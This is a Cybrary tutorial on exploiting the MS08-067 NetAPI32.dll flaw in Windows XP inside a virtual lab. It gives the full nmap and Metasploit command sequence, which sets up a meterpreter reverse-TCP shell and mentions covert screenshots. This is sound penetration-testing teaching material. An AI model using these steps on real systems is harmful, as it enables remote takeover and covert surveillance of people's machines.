Exploiting NetAPI32.dll Using Metasploit

May 22, 2018 | Views: 1413

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

In this article of OP3N, we’re going to see how Windows XP machines can get hacked just by knowing their IP addresses. It should be noted, however, that there are only a few government offices in India that still utilize Windows XP due to lack of management in their software. I suggest that you do not go and look for offices to crack. Instead, let’s just go through hacking a Windows XP machine in a virtualized environment.

The thing is that neither anyone spending enough money on upgrading their software according to newer operating systems nor Microsoft is patching Windows XP anymore. So we’re left with an unpatched and vulnerable operating system.

Now, enough with the details; you guys know this already. Let’s move on and see what we’re actually going to hack on a remote Win XP machine.

There are numerous ways to exploit a Win XP machine, and today, we’re going to exploit the parsing flaw in the path canonicalization code of NetAPI32.dll by the server service, as defined in CVE-2008-4250.

So, what exactly is a server service vulnerability?

The servers of Microsoft Windows provide support for sharing resources, such as files and print services over a network. This service is vulnerable to a remote code execution, and NetAPI32.dll is the cause of this vulnerability. While we process a directory traversal character sequence in path names, there’s an error generated in NetAPI32.dll. 

The vulnerability could be exploited by corrupting stack memory. An example would be sending RPC requests that contain specially crafted path names to the server service component. The NetprPathCanonicalize() function in the NetAPI32.dll file gets affected.

However, this vulnerability is not just in Windows XP; it is also in other operating systems. Other systems that could be exploited through this method are Windows 2000, Windows Server 2003, Windows Vista, and Win Server 2008.

Exploitation

Since I’m doing all this in a virtualized environment, I’ve created two virtual machines and installed Win XP on one and Kali Linux on the other.

First of all, go to your Win XP machine and open the command prompt. Type ipconfig to identify the IP address of the vulnerable machine. For example, the IP address for my Win XP machine is 10.0.0.1. 

Fire up the Kali Linux machine and open a terminal. Inside the terminal, write the following command to get a list of all opened ports and the version of the operating system:

#nmap -O 10.0.0.1

At this point, we’ve gathered a lot information, and now it’s time to fire up our metasploit! So go over to the terminal in Kali and type msfconsole.

It’ll take a while to open up, and once it does, type in the search command to search for modules related to netapi:

> search netapi

There, you’ll find the module exploit/windows/smb/ms08_067_netapi. This is the module that we’re going to use for our exploitation purposes. Start a meterpreter session before selecting the module to exploit the MS08-067 service:

> set payload windows/meterpreter/reverse_tcp

> use exploit/windows/smb/ms08_067_netapi

> show options

Now, set LHOST to 10.0.0.3 (IP of my Kali machine):

> set LHOST 10.0.0.3

Set RHOST to 10.0.0.1 (IP of my WinXP machine):

> set RHOST 10.0.0.1

Finally, type exploit to start the remote exploitation process. It’ll start a meterpreter session in between your Kali machine and Windows machine that will let you execute remote commands to the Win XP machine. For example, the command screenshot will let you take a screenshot of your target machine without letting the user working on that remote machine know about it.

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel